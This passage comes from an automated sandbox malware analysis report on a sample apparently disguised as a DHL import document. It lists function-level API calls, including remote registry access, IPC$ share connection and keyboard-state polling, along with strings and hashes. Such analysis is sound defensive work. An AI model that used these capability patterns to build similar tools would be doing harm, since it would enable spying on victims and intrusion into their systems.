                                                                                          • Instruction ID: 1a4cbf73a3bdd75224209cfdc44eb698016c8f903b5bac14958710e7c5e77426
                                                                                          • Opcode Fuzzy Hash: 5c16de24b4680f0567f6abba1d4fc2b1794bfc160d5fcd7b0dbe95c2775a70be
                                                                                          • Instruction Fuzzy Hash: D2414172900119AADF04FBE4DE4ADEEB778FF55740F100026F605B2191EA796F58CBA1
                                                                                          Function 008306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008307A2
                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008307BE
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008307DA
                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00830804
                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0083082C
                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00830837
                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083083C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                          • API String ID: 323675364-22481851
                                                                                          • Opcode ID: 6673133792f12e1cd62272f549516f8b45f4d5ff9cbd6ceb09c9dd00b3ee848e
                                                                                          • Instruction ID: c95c492da6b15afcd84ac6fc3dad4858a91e89ff8d086e75beb49a44e28b4ba9
                                                                                          • Opcode Fuzzy Hash: 6673133792f12e1cd62272f549516f8b45f4d5ff9cbd6ceb09c9dd00b3ee848e
                                                                                          • Instruction Fuzzy Hash: AF411872C10229EBDF11EBA4DC999EDB778FF44750F05416AE901A32A1EB749E04CF90
                                                                                          Function 00853C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 00853C5C
                                                                                          • CoInitialize.OLE32(00000000), ref: 00853C8A
                                                                                          • CoUninitialize.OLE32 ref: 00853C94
                                                                                          • _wcslen.LIBCMT ref: 00853D2D
                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00853DB1
                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00853ED5
                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00853F0E
                                                                                          • CoGetObject.OLE32(?,00000000,0086FB98,?), ref: 00853F2D
                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00853F40
                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00853FC4
                                                                                          • VariantClear.OLEAUT32(?), ref: 00853FD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 429561992-0
                                                                                          • Opcode ID: 20de80293038ebc0a70c8148e7019ebce42e84b642c52488bd02a9115f57ab98
                                                                                          • Instruction ID: 517aac770418fc73d58b37f4d78b8aca41ef7bb9d4496640420507fa828665d5
                                                                                          • Opcode Fuzzy Hash: 20de80293038ebc0a70c8148e7019ebce42e84b642c52488bd02a9115f57ab98
                                                                                          • Instruction Fuzzy Hash: 0BC10271608205AFD700DF68C88492AB7F9FF89789F10495DF98ADB211DB71EE09CB52
                                                                                          Function 00847A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitialize.OLE32(00000000), ref: 00847AF3
                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00847B8F
                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00847BA3
                                                                                          • CoCreateInstance.OLE32(0086FD08,00000000,00000001,00896E6C,?), ref: 00847BEF
                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00847C74
                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00847CCC
                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00847D57
                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00847D7A
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00847D81
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00847DD6
                                                                                          • CoUninitialize.OLE32 ref: 00847DDC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2762341140-0
                                                                                          • Opcode ID: dd037ea8fd695940ccead705ff87994600321a0a2695413527ba1493323d23f3
                                                                                          • Instruction ID: 21a2b8877e65ca00af6b8e478677939273c7a61781360d2c5bd69e6a27840503
                                                                                          • Opcode Fuzzy Hash: dd037ea8fd695940ccead705ff87994600321a0a2695413527ba1493323d23f3
                                                                                          • Instruction Fuzzy Hash: F2C11A75A04109EFCB14DFA4C888DAEBBB9FF48314B1584A9E91ADB361D730ED45CB90
                                                                                          Function 0086541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00865504
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00865515
                                                                                          • CharNextW.USER32(00000158), ref: 00865544
                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00865585
                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0086559B
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008655AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CharNext
                                                                                          • String ID:
                                                                                          • API String ID: 1350042424-0
                                                                                          • Opcode ID: 0db35870c64301203f4cab6e491897749c151997f25227e9940f1aed7ae6d787
                                                                                          • Instruction ID: bd7f8c4c0bfd6d811c49b81ba92471a2f9d6fd418878393d60eae1814df6ffb2
                                                                                          • Opcode Fuzzy Hash: 0db35870c64301203f4cab6e491897749c151997f25227e9940f1aed7ae6d787
                                                                                          • Instruction Fuzzy Hash: E3618E70900609EFDF109F64CC899FE7BB9FB09724F124189F965EB290DB748A81DB61
                                                                                          Function 0082FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0082FAAF
                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0082FB08
                                                                                          • VariantInit.OLEAUT32(?), ref: 0082FB1A
                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0082FB3A
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0082FB8D
                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0082FBA1
                                                                                          • VariantClear.OLEAUT32(?), ref: 0082FBB6
                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0082FBC3
                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082FBCC
                                                                                          • VariantClear.OLEAUT32(?), ref: 0082FBDE
                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082FBE9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                          • String ID:
                                                                                          • API String ID: 2706829360-0
                                                                                          • Opcode ID: 2440cec3db5bf7b437308043784570e3bc01acb52faa749527d4f25f0a0700e1
                                                                                          • Instruction ID: 35b48653fbfd16d19f71ed74b97969caac005f078034ab9e5646c602c364acda
                                                                                          • Opcode Fuzzy Hash: 2440cec3db5bf7b437308043784570e3bc01acb52faa749527d4f25f0a0700e1
                                                                                          • Instruction Fuzzy Hash: AA413035A00229DFCB00DF68D8589ADBBB9FF48354F418075E946E7262CB74A945CFA0
                                                                                          Function 00839C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?), ref: 00839CA1
                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00839D22
                                                                                          • GetKeyState.USER32(000000A0), ref: 00839D3D
                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00839D57
                                                                                          • GetKeyState.USER32(000000A1), ref: 00839D6C
                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00839D84
                                                                                          • GetKeyState.USER32(00000011), ref: 00839D96
                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00839DAE
                                                                                          • GetKeyState.USER32(00000012), ref: 00839DC0
                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00839DD8
                                                                                          • GetKeyState.USER32(0000005B), ref: 00839DEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          • Opcode ID: 8430129e5bf5ab2386c9aa56c036ab9cfe58c71bea8e42ab182ca9370fa7d591
                                                                                          • Instruction ID: d196d1a90cdf961a7e8aff70a705aacb50b37c7dbff452fa69bb8a123b7b4932
                                                                                          • Opcode Fuzzy Hash: 8430129e5bf5ab2386c9aa56c036ab9cfe58c71bea8e42ab182ca9370fa7d591
                                                                                          • Instruction Fuzzy Hash: 2A41C6345047CA6DFF319664C8053B6BEA0FF91344F04905ADAC7966C2EBE599C8CBE2
                                                                                          Function 0085055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 008505BC
                                                                                          • inet_addr.WSOCK32(?), ref: 0085061C
                                                                                          • gethostbyname.WSOCK32(?), ref: 00850628
                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00850636
                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008506C6
                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008506E5
                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 008507B9
                                                                                          • WSACleanup.WSOCK32 ref: 008507BF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                          • String ID: Ping
                                                                                          • API String ID: 1028309954-2246546115
                                                                                          • Opcode ID: a25a77e25132ef1083fe6654275de892d3ec25963e854261cfac6006284fc691
                                                                                          • Instruction ID: 0a153e0960a5cf715975a88fdbfc7ff18921141dbb3ef0dddbb89cd812cbc500
                                                                                          • Opcode Fuzzy Hash: a25a77e25132ef1083fe6654275de892d3ec25963e854261cfac6006284fc691
                                                                                          • Instruction Fuzzy Hash: 7E91AC356042019FD320CF15C888B1ABBE0FF48318F0585A9E8AADB7A2D771ED49CF81
                                                                                          Function 00858CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                          • API String ID: 707087890-567219261
                                                                                          • Opcode ID: cdf42a91e6545e0076ce4e6e6f6b50729dae362b7232430795148f40ec071761
                                                                                          • Instruction ID: be8dd7d3d7437a016448632e7facb493c8f2fea5fb4cb281cbced1c1ccf50328
                                                                                          • Opcode Fuzzy Hash: cdf42a91e6545e0076ce4e6e6f6b50729dae362b7232430795148f40ec071761
                                                                                          • Instruction Fuzzy Hash: 96518F31A00116DBCF14DF68C9418BEB7B5FF64725B24422AE966F7284EB35DD488B90
                                                                                          Function 0085372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitialize.OLE32 ref: 00853774
                                                                                          • CoUninitialize.OLE32 ref: 0085377F
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,0086FB78,?), ref: 008537D9
                                                                                          • IIDFromString.OLE32(?,?), ref: 0085384C
                                                                                          • VariantInit.OLEAUT32(?), ref: 008538E4
                                                                                          • VariantClear.OLEAUT32(?), ref: 00853936
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                          • API String ID: 636576611-1287834457
                                                                                          • Opcode ID: cb212d5678354f76984865c89b32e105ee0c9f58876b82456bae36e5bb9ad575
                                                                                          • Instruction ID: ce8a12f9bb85f01563f86486691603e80e239cdc5b8e0c63dce344f28acd0dd4
                                                                                          • Opcode Fuzzy Hash: cb212d5678354f76984865c89b32e105ee0c9f58876b82456bae36e5bb9ad575
                                                                                          • Instruction Fuzzy Hash: 2C61B0B0608301AFD715DF64C849B6ABBE4FF49755F100829F985DB291D770EE48CBA2
                                                                                          Function 00843388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008433CF
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008433F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString$_wcslen
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 4099089115-3080491070
                                                                                          • Opcode ID: 9e1bb6ef6a0de54dca2490c06e421d30f3db874165e7b411bec20e6ef3480cfc
                                                                                          • Instruction ID: e830ef5e84145a0ef067986918787661264f7c0e984a66954d99ae8d286ff4d8
                                                                                          • Opcode Fuzzy Hash: 9e1bb6ef6a0de54dca2490c06e421d30f3db874165e7b411bec20e6ef3480cfc
                                                                                          • Instruction Fuzzy Hash: 08518D71900209EADF15EBA0CD4AEEEB778FF14340F144066F505B2292EB692F58DB61
                                                                                          Function 0083B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                          • API String ID: 1256254125-769500911
                                                                                          • Opcode ID: c8d2496c6fde1d30815331842ccd65cdf3b6bea03b0129f30dd31bcfe6acdd0a
                                                                                          • Instruction ID: 22382b54d88d43e96c9f9218db468c4621e4b9314321ec98d386e547520b180d
                                                                                          • Opcode Fuzzy Hash: c8d2496c6fde1d30815331842ccd65cdf3b6bea03b0129f30dd31bcfe6acdd0a
                                                                                          • Instruction Fuzzy Hash: CB41C5B2A010269BCB10AEBDC8925BE77A5FBF0754F244229E625DB285F735CD81C7D0
                                                                                          Function 00845393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 008453A0
                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00845416
                                                                                          • GetLastError.KERNEL32 ref: 00845420
                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 008454A7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                          • API String ID: 4194297153-14809454
                                                                                          • Opcode ID: 08f76b937d81b83b4d0ae9023f48dc1081098e6fd2cc52fdf816a0ca1b9169cc
                                                                                          • Instruction ID: e794de0972d3a70c1213ce0c55684f93d9b9a78e5f5976f7a8ccb79c6fa89ffe
                                                                                          • Opcode Fuzzy Hash: 08f76b937d81b83b4d0ae9023f48dc1081098e6fd2cc52fdf816a0ca1b9169cc
                                                                                          • Instruction Fuzzy Hash: 8B318FB5A006089FCB10DF68C488AAEBBB4FB45349F188065E505DF392EB75DD86CB91
                                                                                          Function 00863C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateMenu.USER32 ref: 00863C79
                                                                                          • SetMenu.USER32(?,00000000), ref: 00863C88
                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00863D10
                                                                                          • IsMenu.USER32(?), ref: 00863D24
                                                                                          • CreatePopupMenu.USER32 ref: 00863D2E
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00863D5B
                                                                                          • DrawMenuBar.USER32 ref: 00863D63
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                          • String ID: 0$F
                                                                                          • API String ID: 161812096-3044882817
                                                                                          • Opcode ID: 1bb2f38f05a6b4fb10391ae6a6ba6bab0e1392cf8ece4fdbd5582c83bd0a2536
                                                                                          • Instruction ID: c74289dd685febd9472434ac8a680af2c0854c2267083ba4db7badbdf6527061
                                                                                          • Opcode Fuzzy Hash: 1bb2f38f05a6b4fb10391ae6a6ba6bab0e1392cf8ece4fdbd5582c83bd0a2536
                                                                                          • Instruction Fuzzy Hash: CA413779A01209EFDF14DF64DC88AAABBB5FF49350F150029FA46A7360D771AA10CB94
                                                                                          Function 00831EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
